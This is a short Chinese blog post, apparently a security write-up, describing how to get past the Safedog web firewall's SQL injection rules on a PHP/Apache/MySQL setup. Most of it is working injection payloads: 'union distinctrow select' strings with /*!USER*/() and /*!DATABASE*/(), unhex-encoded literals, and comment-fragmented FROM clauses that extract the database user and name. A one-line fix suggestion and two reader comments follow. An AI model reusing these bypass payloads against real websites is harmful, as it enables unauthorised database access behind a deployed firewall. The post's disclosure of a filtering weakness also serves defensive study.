完美Bypass安全狗最新版(V3.5.12048)SQL注入防护规则(可UNION)

完美Bypass安全狗最新版(V3.5.12048)SQL注入防护规则(可UNION)

之前的Bypass安全狗是通过更新网马库的方式更新规则的


更新截图  



Mysql UNION语法

http://**.**.**.**/doc/refman/5.5/en/union.html

SELECT ...

UNION [ALL | DISTINCT] SELECT ...

[UNION [ALL | DISTINCT] SELECT ...]

上回提到了这个union all

http://**.**.**.**/bugs/wooyun-2016-0170433

安全狗在过滤危险请求的时候两个敏感字段相邻就会被干掉,但是两个敏感字段中间"插入"点什么的话就不会被匹配到。distinct虽然没提到distinctrow但是也可以。

Windows Server2008 + php + Apache + mysql

开启主动防御:


之前的过滤了


1' union distinctrow select/*!USER*/(),/*!DATABASE*/()#


' union distinctrow select unhex('352E352E34322D6C6F67'),unhex('726F6F74406C6F63616C686F7374')#


FROM

1' union distinctrow select/*!USER*/(),/*!DATABASE*/()/*f*//*r*//*o*//*m*/users#

blog.webhack.cn提供的修复方案是:

在程序中对请求中的distinct进行过滤或者等待下一个升级包。

2 条评论

  1. Ricky.D.

    要是有同学写一个在线注入的工具就好了

  2. Ricky.D.

    23333

Leave a Comment